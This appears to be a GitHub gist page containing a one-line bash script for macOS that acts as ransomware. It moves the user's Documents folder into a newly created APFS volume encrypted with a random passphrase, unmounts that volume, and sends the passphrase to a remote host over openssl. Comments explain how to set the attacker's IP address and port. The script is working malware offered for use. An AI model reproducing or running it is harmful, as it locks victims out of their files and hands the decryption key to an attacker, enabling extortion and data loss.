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Last active September 20, 2022 11:03
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  • Save PonchoSec/7f439eec56ff07dafc92152e6cf6d15e to your computer and use it in GitHub Desktop.
Save PonchoSec/7f439eec56ff07dafc92152e6cf6d15e to your computer and use it in GitHub Desktop.
#! /usr/bin/env bash
sh -c 'p=$(head -n 1024 /dev/urandom | strings| grep -o "[[:alnum:]]" | head -n 64| tr -d "\n");disk_name=$(diskutil info / | grep "APFS Container:" | tr -s " "| cut -d" " -f4);diskutil apfs addVolume "${disk_name}" APFS XX -passphrase "${p}";mv -f ~/Documents/* /Volumes/XX;diskutil umount XX;echo $p | timeout 2 openssl s_client -quiet -connect 2>/dev/null;p="";'
# change the IP address and Port number
# Use chmod +x <name>.sh to make the script executable
# With OpenSSL
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